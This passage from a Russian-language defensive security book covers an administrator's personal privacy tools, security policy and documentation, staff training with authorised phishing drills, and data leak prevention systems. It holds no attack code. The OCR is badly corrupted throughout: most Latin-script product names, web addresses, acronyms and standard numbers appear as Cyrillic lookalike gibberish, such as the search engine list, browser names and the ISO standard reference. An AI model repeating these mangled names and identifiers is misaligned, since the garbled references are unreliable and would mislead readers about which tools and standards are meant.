может прекрасно обезопасить подконтрольные ему системы. 

Основная цель этой части книги — не привести готовые примеры настройки бранд¬ 
мауэров, сетевых сервисов, оборудования и прочих столь милых сердцу админи¬ 
стратора вещей, а познакомить читателя с основными принципами защиты сети. 
В частности, мы рассмотрим, как уберечь свою инфраструктуру от того, другого 
читателя, которой более чем внимательно изучил предыдущие главы нашей книги. 

Как и в некоторых других главах, мы начнем здесь с базовых, нетехнических по¬ 
нятий. Коснемся обучения пользователей основам безопасности, а затем плавно 
перейдем к техническим мерам. Рассмотрим принципы работы и настройки ос¬ 
новных систем, а также возможные проблемы, связанные с их использованием. 
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Итак, приступим. Почему мы решили назвать эту главу именно так? На то есть 
несколько причин, и главная из них — это то, что вы являетесь администратором 
сети. В профессии системного администратора есть один плюс — ты можешь на¬ 
строить все что угодно во всех системах, а также один минус — ты будешь настраи¬ 
вать все что угодно во всех системах. Из этого утверждения вытекает то, что у вас, 
как у системного администратора, есть доступ к этим системам, а это значит, что 
именно вы и ваша рабочая станция можете стать главной целью злоумышленников! 
Следовательно, себя вы должны обезопасить в первую очередь. 

Вторая причина — личный пример. Традиционно и до сих пор специалист по ИВ 
является элитным сотрудником любой компании. Если провести аналогию с арми¬ 
ей, вы как матерый боец отряда «Альфа» по сравнению с только что призванным 
новобранцем-срочником. Пользователям и коллегам не понравится, если вы будете 
запрещать им устанавливать игры на рабочие станции, а сами станете играть в І )оі;а, 
С8 или проводить время в социальных сетях. Вы — пример для подражания! 

Начнем с основ. Ни один компьютер не сможет работать без операционной систе¬ 
мы. Сразу же оговоримся, что мы не будем подливать масла в огонь и рассуждать 
о том, что лучше — Ыпих, \Ѵтс1о\ѵ5 или продукция Арріе. Подойдем к выбору более 
рационально. Если в вашей сети все пользователи работают под ѴѴІікІоѵѵз, то вполне 
логично, что вы тоже должны использовать ее в качестве своей основной рабочей 
ОС. Это позволит вам оперативно реагировать на различные проблемы и понимать 
то, как чувствует себя в вашей сети рядовой пользователь. Очень важно понимать, 
что не пользователи работают на нас, а мы работаем для пользователя. Ему всегда 
должно быть уютно и безопасно в наших владениях. 

Если же вы — администратор гетерогенной сети, то вполне логично установить 
первой ОС ту, в которой вы лучше разбираетесь. Это поможет сделать вашу работу 
комфортной, эффективной и безопасной. 

Наверное, вы уже заметили, что мы говорим о первой ОС. На самом деле было 
бы здорово иметь под рукой тестовую машину, никак не связанную с вашей сетью 
и имеющую отдельный выход в Интернет. Вот тут у вас и появляется простор 
для творчества. Вы можете тестировать различные обновления и операционные 
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системы, исследовать подозрительные файлы и проверять, как выглядит ваша 
инфраструктура извне. 

Еще один пункт, которой надо иметь в виду, - приватность. Весьма заманчиво, 
получив должность специалиста по ИБ в компании из списка Еогіипе 500, сразу же 
рассказать об этом на своей страничке в социальной сети, однако это будет плохой 
идеей, и из-за этого вас могут даже уволить. Обязательно уделите пристальное 
внимание вопросам сохранения приватности. Предъявляйте к себе более высокие 
требования, чем к рядовым сотрудникам. 

Поскольку изолировать себя от общества нереально — мы, люди, являемся соци¬ 
альными существами, — будет хорошей идеей завести себе виртуального двойника 
в сети. Создайте себе новый профиль в социальной сети, заведите еще один адрес 
электронной почты на одном из бесплатных сервисов. А затем уже смело исполь¬ 
зуйте эти данные для регистрации на различных сайтах и тематических форумах. 
Главное — чтобы указываемая вами при создании «нового» человека информация 
никоим образом не была связана с вами. А это значит, что нельзя указывать при 
регистрации свой настоящий е-таіі, даже если он будет использоваться только для 
восстановления пароля, то же самое касается номера телефона. Нельзя заходить 
в социальную сеть, используя новый профиль, со своего смартфона. Нельзя ис¬ 
пользовать одни и те же вопросы для восстановления пароля или же другие, но при 
этом указывая для ответа настоящие данные. Этот список можно продолжать очень 
долго — следите за собой и не ленитесь придумать по-настоящему нового человека. 

Предположим, что вы создали нового человека, но что же дальше, ведь на этом все 
не заканчивается. Отвлечемся на мгновение от фантазий на тему «каким бы я хотел 
видеть свое второе я» и зададимся одним простым вопросом: когда у вас что-то не 
получается или вы не знаете ответа, куда вы прежде всего обращаетесь за помо¬ 
щью? Мы уверены, что большая часть наших читателей ищет ответы в Ооофе или 
Яндекс. Вы никогда не замечали одну особенность? Если вы, предположим, искали 
новую летнюю резину для своей любимой машины или более хорошую видеокарту 
для домашнего компьютера, то даже если вы приобрели заветную вещь, еще очень 
долго самые разные сайты будут показывать вам релевантную рекламу в надежде 
на то, что вы сделаете эту покупку еще раз и именно у них. 

Есть несколько способов избежать этого и сохранить свои предпочтения в тайне. 
Самый простой способ — использовать поисковые системы, не собирающие пер¬ 
сональные данные. Подобные поисковые системы обычно работают с более круп¬ 
ными поисковиками, такими как Ооофе, УаЬоо!, Віп§ и т. д., что, в свою очередь, 
гарантирует качество и релевантность результатов поиска на должном уровне. 
Однако, в отличие от крупных поисковиков, они заботятся о вашей приватности, 
в частности они не раскрывают ваш адрес, данные о вашей системе, программном 
обеспечении, местонахождении и многом другом. 

Исходя из личного опыта, можем порекомендовать следующие сервисы: 

□ сіізсоппесі.те; 
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□ бискс1иск§о.сот; 

□ зѣагіра^е.сот. 

Следующий момент, которого хотелось бы коснуться, — безопасные браузеры. 
Сразу же оговоримся, что мы не рекомендуем устанавливать такие браузеры всем 
пользователям вашей сети. И Б всегда балансирует между максимальной защищен¬ 
ностью и удобством работы. А такие браузеры вызовут недовольство у рядовых 
сотрудников, что может привести к тому, что руководство заставит вас вернуть 
пользователям привычное им ПО. 

Есть два основных типа браузеров — созданные с целью сохранения приватности 
и использующие различные надстройки для обеспечения безопасности пользова¬ 
теля. 

В качестве примера первого типа браузера можно привести Еріс ргіѵасу Ьго\ѵзег. 
Он был создан на основе СЬгогпшт — браузера с отрытым исходным кодом, раз¬ 
работанного компанией Соо§1е. Его основная задача — защита вашей приватности. 
Все куки уничтожаются после каждой сессии, трафик проходит через серверы 
разработчиков, позволяя скрыть ваш ІР-адрес, а соединение с веб-сайтами осу¬ 
ществляется преимущественно через 55Б. 



Рис. 17.1. Интерфейс Еріс ргіѵасу Ьгоѵѵзег 
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Примером браузера, который использует различные надстройки для обеспечения 
приватности, может служить Сотобо бга§оп на основе СЬготіит или Сотобо 
ісебга§оп на основе МогШа Рігеіох. 

Одной из особенностей данного браузера — на наш взгляд, очень важной — явля¬ 
ется использование им своих собственных [Ж8-серверон. А это, в свою очередь, 
позволяет защититься от фишинговых атак и от возможности попадания вредо¬ 
носных программ на вашу рабочую станцию. 

Еще одна интересная вещь — это виртуальная среда, в которой браузер запускается 
в изолированном от остальной системы режиме, но, к сожалению, данная опция 
доступна только обладателям продукта Сотобо Іпісгпсі Зесигііу. 



Рис. 17.2. Интерфейс Сотобо ісебгадоп 


На самом деле есть и другие браузеры, нацеленные на сохранение вашей приват¬ 
ности, — Вгаѵе, ПооЫе, Аѵіга 8сопі и т. д., их мы оставляем на ваше самостоятельное 
рассмотрение. 

В ключе разговора о браузерах мы хотели бы рассмотреть одно любопытное до¬ 
полнение. К сожалению, оно недоступно для пользователей Соофс СЬгоше через 
магазин приложений, и скоро вы поймете почему. 

Наш разговор пойдет об АбКашеапі. В отличие от других расширений, оно не толь¬ 
ко прячет нежелательные рекламные объявления, но еще и имитирует проходы по 
ним. Что приводит к тому, что собирающие о вас информацию системы начинают 
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предполагать, что вас интересует все, начиная от похудения и заканчивая про¬ 
блемами миграции кенгуру в брачный период. Естественно, что в этом огромном 
объеме данных ваши настоящие интересы просто затеряются. 

Так почему же Соо§1е не позволяет своим пользователям устанавливать это рас¬ 
ширение? Во-первых, это связанно с тем, что эта компания является одним из 
лидеров по сбору и обработке персональных данных. Вторая причина — бизнес-мо¬ 
дель. Пользователи рекламной сети Соо§1е не платят за показы рекламы, а только 
за переходы по объявлениям. Использование данного плагина ведет к убыткам, 
поскольку клик по ссылке был и деньги за него были списаны, а реального пере¬ 
хода не произошло. АсПЧаизеат, как бы издеваясь над всей отраслью контекстной 
рекламы, показывает примерную сумму, на которую она уже «накликала». 
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Рис. 17.3. АсіЫаизеат показывает количество кликов и потраченных денег 
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Раз уж зашел разговор о ПО, созданном для защиты вашей приватности, было бы 
огромным упущением с нашей стороны не рассказать об ОС, созданных с той же 
целью. 

Большая часть из них представляет собой модификации ПеЬіап или I Липпи. Опе¬ 
рационные системы данного класса можно запускать с внешних носителей, таких 
как ПѴО. Преимущество такого подхода в том, что даже если во время работы на 
вашу рабочую станцию проникло вредоносное ПО, после перезагрузки вы опять 
получите чистую и нетронутую ОС. 

К тому же такие ОС уже сконфигурированы для использования сети Тог, что безус¬ 
ловно помогает вам обеспечить свою приватность и даже посещать закрытые сайты. 

Как правило, такие ОС не ограничиваются одним лишь использованием Тог, они 
поставляются с большим количеством предустановленного и настроенного ПО, 
в том числе для: 

□ шифрования и дешифровки носителей, электронной почты и другой инфор¬ 
мации; 

□ безопасного пользования Интернетом (про браузеры такого типа мы говорили 
чуть выше); 

□ использования генераторов и менеджеров паролей; 

□ обеспечения удобной и безопасной работы с сетью. 

На наш взгляд, среди огромного множества таких систем наибольшего внимания 
заслуживают: 

□ Таік — одна из самых бурно развивающихся. Известна тем, что эту ОС исполь¬ 
зовал Эдвард Сноуден; 

□ \ѴЬопіх — предназначена для использования в качестве гостевой изолированной 
ОС, работающей в ѴігПіаІ Вох и использующей сеть Тог; 

□ ІргебіаОБ — в отличие от других проектов, вместо Тог использует І2Р и постро¬ 
ена на основе Ребога Біпих; 

□ [ ЖсгссТс Ьіпих — обеспечивает высокий уровень защиты и предназначена для 
людей, не имеющих глубоких знаний в области ИТ. 

Безусловно, мы не рассмотрели множество прочих аспектов обеспечения личной 
безопасности, но мы надеемся, что наш читатель и так не забывает о регулярном 
обновлении ПО, установке антивируса, шифровании диска, использовании шиф¬ 
рования и блокировки телефона, создании безопасных паролей и о многом другом, 
что составляет основу личной информационной безопасности. 
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В наше время достаточно сложно найти специалиста в области ИТ, который любил 
бы бумажную работу, однако, как говорится, порядок должен быть! 

Начнем с того, что когда вам доведется проводить аудит ИС согласно модели «бело¬ 
го ящика», вы будете просто обязаны попросить документацию. Хороший специ¬ 
алист всегда попросит документацию к системе, но только лучший ознакомится 
со всей документацией предприятия, имеющей отношение к данной ИС и не вы¬ 
ходящей за рамки его компетенции. Тут мы имеем в виду, что требовать документы 
из бухгалтерии вряд ли будет хорошей идеей. Для этого есть другие аудиторы, не 
будем отбирать у них хлеб. 

Рассмотрим основные причины не пренебрегать столь важным, хотя и, на наш 
взгляд, несколько скучным занятием. 

Любой документ, будь то внутреннее распоряжение, предписание, правило поль¬ 
зования и т. д., в случае, если он не противоречит текущему законодательству, 
является обязательным для исполнения. В нашем случае это значит, что любой 
пользователь может игнорировать ваши устные предупреждения и советы, однако 
за игнорирование инструкций он может понести наказание. 

Кроме того, это оптимизация работы. Особенно это касается больших предпри¬ 
ятий. Согласитесь, что проще потратить день и написать грамотную инструкцию, 
чем доносить информацию о новой системе каждому пользователю индивидуально 
или устраивая бесконечные собрания и совещания. В случае же, когда с течением 
времени в работе системы произойдут какие-либо изменения, вы сможете попро¬ 
сту разослать всем пользователям новый вариант инструкции, и на этом — всё. 
Во второй и последующие разы вы потратите на подготовку таких документов 
существенно меньше времени. 

Третья причина касается вашего взаимодействия с коллегами. Обычно работни¬ 
ки ИТ-сферы — люди умные и привыкли делить между собой ответственность 
за различные ИС. В этом есть огромный плюс — когда человек не распыляется 
на множество систем, он начинает работать лучше и эффективнее. Однако есть 
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и существенный минус, поскольку, как и всем остальным людям, работникам ИТ- 
сферы свойственно болеть, уходить в отпуска или не подходить к телефону. В та¬ 
ком случае вся ответственность за системы отсутствующего коллеги ложится на 
плечи оставшихся сотрудников. И будет большой удачей, если их больше одного. 
В этом случае одного часа, потраченного на изучение документации, достаточно 
для решения множества проблем или выполнения каких-либо административных 
задач. В качестве примера можно привести Ш )о8-атаку. Представьте себе, что она 
началась, а вы знакомы с панелью управления брандмауэром постольку-поскольку, 
однако решение необходимо принять срочно. Сколько вы потратите времени на 
поиск решения данной проблемы, например, в сети Интернет? А в хорошей доку¬ 
ментации по брандмауэру этот пункт должен быть выделен полужирным шрифтом 
и стоять отдельно. 

Четвертая причина касается больше работы самого предприятия. Хотя специ¬ 
алистами по ИВ и не разбрасываются, однако текучесть кадров никто не отменял. 
Для предприятия будет большим риском передавать системы в управление новому 
сотруднику без наличия должной документации. 

Всегда следует помнить о том, что управление документацией — это процесс. Со¬ 
временные реалии, особенно в мире ИВ, меняются очень стремительно, что тре¬ 
бует постоянного пересмотра и корректировки различных пунктов нормативных 
документов. 

Теперь, ощутив важность наличия документации как таковой, рассмотрим основ¬ 
ные типы документов и коротко коснемся их содержания. 

Политика безопасности 

Некоторые источники определяют политику безопасности как совокупность до¬ 
кументов, описывающих административные и технические меры, направленные на 
защиту информации и связанных с ней ресурсов. С данным определением нельзя 
не согласиться, однако на практике политикой безопасности принято называть 
один лишь документ самого верхнего уровня, описывающий общие принципы ИВ 
организации. 

Если сравнивать политику безопасности с другими юридическими докумен¬ 
тами, то, пожалуй, лучшим образцом будет конституция. Она является основ¬ 
ным документом, которому должны соответствовать все остальные документы 
в организации. В ней будет не так уж много конкретики, как, например, в опи¬ 
сании стандартных процедур, зато она охватывает достаточно широкий спектр 
вопросов. 

Мы не будем приводить здесь примеры или шаблоны стандартной политики без¬ 
опасности. Во-первых, это связано с тем, что лучше писать свою политику под 
каждое предприятие с учетом его особенностей, возможных рисков и доступной 
стратегии защиты. А во-вторых, шаблоны очень легко найти в Интернете. 
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Теперь коснемся содержания данного документа. Следует понимать, что политика 
безопасности создается прежде всего для пользователей и руководства компа¬ 
нии и только потом для ИТ-сотрудников. Это, в свою очередь, означает, что она 
должна быть как можно более краткой и понятной. Следует избегать упоминания 
конкретных технологий или ПО, сложных для понимания непрофессионалами 
формулировок и перегрузки терминологией. Однако в случаях, когда без техниче¬ 
ских терминов не обойтись, обязательно нужно их разъяснить. Если политика не 
будет соответствовать этим критериям, ее попросту никто не будет читать. А ведь 
мы хотим создать настоящую работающую безопасность, а не формально соответ¬ 
ствующую заданным критериям. 

Итак, документ начинается с общих положений. В них необходимо обосновать 
значимость данного документа, чтобы рядовой сотрудник понял, для чего нужна 
политика безопасности. Также если в дальнейшем будут использоваться специаль¬ 
ные термины, то лучшего места для объяснения, чем начало документа, и быть не 
может. Можно также указать документы, на основании которых подготавливалась 
данная политика. 

Далее необходимо описать цели и задачи обеспечения информационной безопас¬ 
ности организации. Также нужно определить основные риски и объекты защиты. 
Следует рассмотреть различные виды угроз безопасности, определить их источни¬ 
ки и описать меры защиты от них. 

Необходимо учесть, что политика должна быть реальной и исполняемой. А это 
значит, что придется соблюдать баланс между удобством использования И С и их 
безопасностью. 

В конце документа необходимо коснуться вопроса ответственности служб и каждо¬ 
го сотрудника за возникновение связанных с И Б инцидентов, а также определить, 
каким образом будет осуществляться контроль за исполнением изложенных по¬ 
ложений. 

Каждый сотрудник, имеющий доступ к И С организации, должен ознакомиться 
с данным документом. 

Стандарты 

Согласно Википедии, стандарт в широком смысле слова — это образец, эталон, 
модель, принимаемые за исходные для сопоставления с ними других подобных 
объектов. 

Стандарты являются документами более низкого уровня по отношению к поли¬ 
тике безопасности и предназначены для более узкой аудитории, в основном для 
ИТ-специалистов. 

Стандартизация позволит вам достичь необходимого уровня унификации, упоря¬ 
дочения и взаимосвязи ИС. Стандартизировать можно все что угодно — методы 
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оценки рисков ИБ, свойства совместимости, принципы шифрования, процесс 
управления ИС, вопросы физической безопасности и т. д., — перечислять можно 
еще очень долго. Разумеется, если вы единственный ИТ-специалист на предпри¬ 
ятии, необходимость в их создании минимальна, однако в рамках больших орга¬ 
низаций их значение трудно переоценить. 

Да, описывать необходимо многое, но не стоит этого пугаться. Международное со¬ 
общество уже пришло к нам на помощь и разработало стандарты, которыми можно 
пользоваться. Однако всегда надо помнить о принципе реальности исполнения. 
Нельзя просто взять и скопировать, ведь часто бывает так, что на текущий мо¬ 
мент у предприятия недостаточно ресурсов для исполнения всего, что описывают 
международные стандарты. В таком случае вам придется временно изменить не¬ 
которые положения для того, чтобы документ соответствовал реальной ситуации. 
В противном случае вы столкнетесь с тем, что хотя документ и принят, но по факту 
никем не исполняется. 

В контексте данного раздела рекомендуем ознакомиться с такими стандартами, как: 

□ 180/1 Г’С 17799:2002 — один из самых известных стандартов, он создан на основе 
В8І и рассматривает практические вопросы по управлению информационной 
безопасностью; 

□ В8І — стандарт разработан в Германии и посвящен, в отличие от предыдущего, 
подробному освещению более частных вопросов; 

□ 180 15408 — стандарт создан на основе опыта коллег из США и Канады, опи¬ 
сывает общие критерии безопасности информационных технологий. 

Безусловно, это не полный список, а всего лишь отправная точка для дальнейших 
исследований. 

Процедуры 

Процедуры находятся на самой низкой ступени иерархии документов. Но это не 
значит, что написанное в них можно смело и безнаказанно игнорировать. 

Обычно процедуры описывают порядок выполнения каких-либо действий, свя¬ 
занных с ИС. В качестве примера можно привести процедуру создания нового 
пользователя в системе. 

В документе должны описываться: достаточные обоснования для заявки на со¬ 
здание пользователя, должность сотрудника, имеющего право на создание таких 
заявок, должность специалиста, обрабатывающего заявку, последовательность 
создания пользователя, а также стандартные привилегии доступа. 

В случае, если пользователю требуются расширенные права доступа, для их при¬ 
своения необходима отдельная процедура. 
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Наличие процедур позволит упорядочить происходящие в организации процессы 
и повысить ее безопасность. ИТ-специалисты не должны выполнять никаких дей¬ 
ствий в обход процедур, но, напротив, пресекать таковые. 

Процедуры являются тем документом, на который можно сослаться в случае не¬ 
выполнения каких-либо действий по объективным причинам. 

Конечно же, не все можно описать конечным набором документов. Будут и такие 
ситуации, которые не укладываются в список описанных процедур. И в случае 
форс-мажорных обстоятельств вам не следует садиться за написание документа, 
потом согласовывать его и только после этого что-то делать. Вначале необходимо 
устранить опасность, проанализировать, предотвратить ее повторение и только 
потом приниматься за исправление документации. 

Следует учесть, что документация никогда не сможет отхватить все, однако ее от¬ 
сутствие представляет серьезные риски для организации. 

Инструкции 

В основном это правила пользования тем или иным функционалом И С. Чаще все¬ 
го пишется создателем системы для рядовых пользователей. Все, что не касается 
пользователей, обычно описывается в технической документации. 

При написании инструкций следует руководствоваться тем, что их будет читать 
рядовой пользователь. А это значит, что писать надо как можно более простым 
языком с использованием минимума терминологии и везде, где это уместно, до¬ 
бавлять к тексту иллюстрации с пометками и указателями. 

Техническая документация 

Такие документы составляются исключительно для ИТ-специалистов. Именно 
здесь не только можно, но и нужно указывать различные технические тонкости 
и нюансы, выплеснуть на страницы все то, что приходилось держать в себе при 
написании других документов. 

Несмотря на то что, как мы уже сказали, данной документацией будут пользоваться 
специалисты, не стоит лениться и надеяться на то, что те нюансы, которые понятны 
вам, будут так же ясны другим. Следует потрудиться и написать хорошую, полную 
документацию, после прочтения которой даже у человека с пробелами в знаниях 
не останется вопросов. 

Хорошая документация должна содержать в себе следующие пункты: 

□ аннотацию — краткое описание предназначения данного документа, функции 
И С и ее компонентов; 
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□ список сокращений — облегчит понимание сути документа коллегами, а вам 
позволит быстрее справиться с его написанием; 

□ схемы — логическая и сетевая, для облегчения понимания обязательно пред¬ 
ставленные графически; 

□ инструкция для администратора — описание установки и конфигурации И С, 
выполнение основных административных действий; 

□ обновление И С — процедуры обновления И С, проверки ее работоспособности 
и устранения возможных проблем; 

□ тестирование работоспособности — какие шаги следует принять для всесторон¬ 
ней проверки ИС, критерии удачного прохождения тестов; 

□ аварийные ситуации — рассматриваются возможные нештатные ситуации 
работы И С, алгоритмы поиска и устранения проблем, а также способы восста¬ 
новления работоспособности. 
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Необходимо четко усвоить, что И Б не является конечным набором конкретных 
мер, приняв которые администратор может ощутить себя в полной безопасности 
и более не уделять внимания этому вопросу на протяжении следующих 3-5 лет. 

Безопасность — это непрерывный процесс. ИТ, в принципе, являются очень бурно 
развивающейся отраслью, и необходимо постоянно следить за происходящими 
в ней изменениями. Для этого вовсе не обязательно еженедельно прочитывать по 
огромному талмуду, посвященному какому-либо аспекту ИБ. Для начала подпиши¬ 
тесь на новостные рассылки специализированных ресурсов, например ЗесигйуБаЪ, 
[)агк КсасІ і пД и ЗесигДу \Ѵеек. 

Также будет хорошей идеей подписаться на новостную рассылку, организован¬ 
ную производителем ПО, используемого вашей организацией. Это поможет вам 
из первых рук узнавать про новые бреши в защите, патчи и обновления. И если 
новости с агрегаторов можно читать пару раз в неделю, то информации из узких 
специализированных источников, коими и являются сообщения от производите¬ 
лей ПО, необходимо уделять первостепенное внимание. Очень часто бывает так, 
что информация об уязвимостях приходит к разработчикам с опозданием даже не 
в несколько дней, а в несколько месяцев, и кто знает, быть может, злоумышленник 
уже воспользовался этим и провел атаку на вашу сеть? 

Следующее, чему стоит уделить внимание, — образование. Даже если вы окончили 
университет с соответствующей специализацией, смиритесь с тем, что полученные 
за несколько лет знания устарели уже на момент получения вами диплома. 

Организации обычно оплачивают своим сотрудникам специализированные кур¬ 
сы. Однако, как мы уже писали, знания устаревают. Поэтому один и тот же курс 
можно и нужно проходить раз в 3-5 лет. Сразу оговоримся, что приведенная 
цифра является среднестатистической. Некоторые курсы, например привязанные 
к определенной версии ПО, вообще не требуют переаттестации. 

Также мы рекомендуем не забывать и о специализированных форумах. На самом 
деле одним из лучших способов самообразования является обучение других людей. 
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Помогая своим коллегам, вы столкнетесь с нетривиальными и интересными за¬ 
дачами, для решения которых вам может потребоваться ознакомление с большим 
количеством информации, что сразу же повысит ваш профессиональный уровень. 
Не бойтесь браться за то, чего не знаете, ведь только так можно расширить границы 
познанного. 

Не стоит оставлять без внимания и различные онлайн-курсы. Мы хотим обратить 
ваше внимание именно на веб-сайты, предоставляющие бесплатный доступ к раз¬ 
личным образовательным программам, такие как ебХ и Соигзега. Безусловно, 
они не смогут заменить полноценное образование, однако такие курсы обычно 
составляются преподавателями из очень хороших университетов и из них можно 
почерпнуть достаточно интересную информацию и свежие идеи. 

Тренировки 

Как мы уже сказали, учить других всегда интересно, весело и полезно для само¬ 
развития. На курсах автовождения людей тренируют оказывать первую помощь, 
в крупных организациях минимум раз в год включают пожарную сигнализацию 
и учат людей эвакуироваться. Так почему бы и ИТ-специалистам не устраивать 
тренинги для коллег из своего департамента и сотрудников организации? 

Итак, проникнувшись идеей всеобщего образования, рассмотрим несколько вари¬ 
антов обучения. 

Начнем с ИТ-специалистов. Они — люди подкованные и на них не страшно на¬ 
бивать руку. Даже если что-то пойдет не так, им всегда все проще объяснить и до¬ 
говориться. 

Для начала получите одобрение вашего руководства, а затем уже начинайте уче¬ 
ния. На наш взгляд, лучше всего, если о предстоящих тестах никто не будет ничего 
знать, кроме вас и начальства. Используя методологию и приведенные в данной 
книге примеры, попробуйте провести тест на проникновение. Это поможет вам 
выявить слабые места в защите вашей инфраструктуры, а также определить, на¬ 
сколько быстро ваши коллеги заметят попытку проникновения, как они на нее 
отреагируют, каким образом будет проведено расследование инцидента и какие 
меры будут приняты для предотвращения подобных случаев в будущем. 

Сразу же хотим сказать, что в случае успешного проникновения, неправильных 
действий сотрудников организации и полного игнорирования ситуации будет не¬ 
верно устраивать публичное обсуждение и наказание виновных. Это может приве¬ 
сти к тому, что с вами, как со специалистом по ИБ, просто перестанут сотрудничать. 
Мы не хотим сказать, что надо умалчивать о проблемах. Нет, о них надо говорить 
и совместно искать методы решения, однако не стоит переходить на личности, 
а тем более применять санкции. Было бы логичнее отправить таких сотрудников 
на курсы повышения квалификации. Это касается как ИТ-специалистов, так и ря¬ 
довых сотрудников. 
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Хотим отдельно выделить социальную инженерию. Про нее уже написано множе¬ 
ство книг, родители с детства учат детей не доверять чужим дядям и тетям, однако 
количество связанных с ней инцидентов не уменьшается. 

Проводить учения по противостоянию таким атакам можно со всеми сотрудни¬ 
ками. Например, разошлите письмо, в котором будет сказано, что срок действия 
учетной записи истекает и для его продления необходимо перейти по указанной 
ниже ссылке. 

Естественно, что ссылка приведет на созданную вами же страничку. Чтобы стало 
интереснее, поставьте на эту страницу недействительный ЗЗЬ-сертификат, а затем 
собирайте статистику о том, сколько пользователей проигнорировало предупреж¬ 
дения браузера. Результаты превзойдут все ваши ожидания, уверяем вас! 

Социальная инженерия — область творческая, тут все ограничивается только лишь 
вашей фантазией. Придумывайте различные сценарии и отрабатывайте их на кол¬ 
легах. Смелее, вам за это ничего не будет! 

И третий пункт — это обучение. Причем если ИТ-специалистов можно попросту 
отправить на курсы, то остальных коллег лучше обучить самому. Придумайте 
мультимедийный курс и выделите один день в месяц, когда вы или кто-то из со¬ 
трудников отдела ИБ будет собирать всех новых коллег вместе и рассказывать им 
про основные ИС вашего предприятия, правила работы с ними и, разумеется, про 
основы ИБ. Не забудьте рассказать о безопасных паролях, фишинге и социальной 
инженерии. Объясняйте сложные вещи простым языком, не забывайте про юмор 
и истории из реальной жизни, представьте, что вы делаете презентацию не для 
взрослых, а для детей. Поверьте, лучше проводить такие курсы лично, ибо вопро¬ 
сов возникает много, а людям приятно, что с ними работает такой высококлассный 
специалист, как вы. 

Естественно, вы не сможете работать абсолютно со всеми сотрудниками. Одно¬ 
дневные курсы для новичков — это скорее исключение, нежели практика. Однако 
для поддержания информированности сотрудников вы можете организовать 
внутреннюю рассылку или сделать соответствующий раздел в интранете. Так вы 
сможете постоянно информировать коллег о новых угрозах и способах избежать их. 




Защита от утечки 
информации 


Надо сказать, что как бы мы ни любили и ни уважали своих пользователей, мы не 
можем доверять им на все сто процентов. К нашему великому сожалению, всегда 
найдутся люди, которые сами — по незнанию или с корыстной целью — высылают 
приватную информацию за пределы сети. Человек — всегда самый ненадежный 
и непредсказуемый элемент в нашей системе. Согласно данным наших зарубежных 
коллег, до 88% утечки данных происходит из-за ошибок пользователей или несо¬ 
вершенства бизнес-процессов. Но, к сожалению, зачастую мы не можем повлиять 
ни на эти процессы, ни на пользователей. 

Итак, покончим с плохими новостями и перейдем к хорошим. Естественно, мы 
не можем стоять за плечом каждого пользователя и контролировать все его 
шаги, но этого и не нужно. Процесс контроля над критической информацией 
всегда можно автоматизировать, для этого мы можем использовать ВЬР ( Ваіа 
Еозз РгеѵепЧоп ). 

Что же представляют собой системы для предотвращения потери данных? Обычно 
это специализированное ПО, имеющее серверную и клиентские части, которое 
позволяет классифицировать критическую информацию и предотвращать ее 
утечку по различным каналам связи. Современные ВЬР могут контролировать 
как информацию, находящуюся на компьютерах пользователей, так и ту, которая 
пересылается по сети. 

Утечка информации может происходить разными путями — через электронную 
почту, веб-приложения, внешние носители — и даже распечатываться на принтере. 
ВЬР контролируют все эти потоки. 

Сразу хотим оговориться, что внедрением ВЬР невозможно предотвратить 100% 
утечек, однако, в совокупности с другими решениями, внедрение ВЬР позволяет 
значительно снизить риски организации. 

ВЬР могут быть разделены на две категории — интегрированные и корпора¬ 
тивные решения. Корпоративные решения представляют собой набор ПО для 
установки на самые различные системы, такие как серверы, рабочие станции, 
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виртуальные машины, и обеспечивают мониторинг потока данных и классифи¬ 
кацию информации. Интегрированные решения имеют более узкую сферу при¬ 
менения, в основном они работают промежуточными шлюзами для почтового, 
веб- и прочих видов трафика. 

ИЬР проводят мониторинг данных, анализируя две основные составляющие любой 
информации — содержание и контекст. Если с содержанием все понятно — напри¬ 
мер, мы находим и не выпускаем за пределы сети все документы, содержащие но¬ 
мера кредитных карт, — то с контекстом несколько сложнее. Некоторые ошибочно 
полагают, что контекст — это что-то вроде обложки у книги, однако это далеко не 
так. Проверка контекста включает анализ таких данных, как размер, формат, за¬ 
головки, источник информации и многое другое, что не относится к содержанию. 
Основная идея заключается в том, чтобы настроить систему как можно более тонко, 
подвергая анализу не только содержание информации, но и то, в каком контексте 
она была отправлена. 

Существует несколько основных техник, используемых для анализа содержания 
информации: 

□ Правила или регулярные выражения — самый основной и простой метод 
проверки информации. Мы можем отслеживать попытки выслать письма, со¬ 
держащие 16-значные номера кредитных карт или, например, слово «договор». 
С такими фильтрами очень легко работать, однако они дают достаточно боль¬ 
шой процент ложных срабатываний. 

□ Метод цифровых отпечатков — очень похож на первый способ. В данном слу¬ 
чае в момент прохождения информации с нее снимается цифровой отпечаток 
и сравнивается с другими отпечатками, уже находящимися в базе данных ВЬР. 
Это достаточно ресурсоемкий процесс, поэтому он может повлиять на произ¬ 
водительность . 

□ Точное совпадение фалов — содержимое файлов не подвергается анализу. 
Сравниваются только цифровые отпечатки файлов. Такой подход дает низкий 
процент ложных срабатываний, однако плохо работает в среде, где есть мно¬ 
жество файлов, содержимое которых имеет между собой очень мало различий. 

□ Частичное совпадение — ищет частичное соответствие в определенных файлах. 
Это могут быть, например, одинаковые формы, заполняемые разными пользо¬ 
вателями. 

□ По словарю — информация фильтруется с использованием комбинации данных 
из таких источников, как, например, словари и правила. 

□ Статистический анализ — использует нейронные сети или статистические 
методы, например байесовский анализ для фильтрации данных. Особенность 
этого метода в том, что система вначале обучается на большой выборке данных, 
что может занять некоторое время. После запуска вы обязательно будете на¬ 
блюдать некоторое количество ложноотрицательных и ложноположительных 
срабатываний. 
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□ Встроенные фильтры — обычно создаются производителем системы. С их по¬ 
мощью можно хорошо фильтровать типы данных, например номера кредитных 
карт. 

Надеемся, что вы уже поняли необходимость внедрения такой системы. Следую¬ 
щим шагом, еще даже до выбора программного решения, должен стать аудит те¬ 
кущей ситуации в организации. Без него будет очень трудно выбрать подходящий 
вам продукт и невозможно грамотно его настроить, но этого вопроса мы коснемся 
чуть позднее. 

Первым шагом будет понимание бизнес-процессов. Как мы уже сказали, ББР 
предотвращает потерю конфиденциальной информации. Для выполнения этой 
задачи необходимо определить, какая информация является конфиденциальной, 
а какая — нет. Также следует четко понимать, куда эта информация может пере¬ 
сылаться и по каким каналам, а также где эта информация находится и кто имеет 
право с ней работать. И да, мы не говорили, что внедрение ББР — это легко! 

Для примера сравним хостинговую компанию и, предположим, оператора сотовой 
связи. Услуги хостинга чаще всего покупают через Интернет, а это подразумевает, 
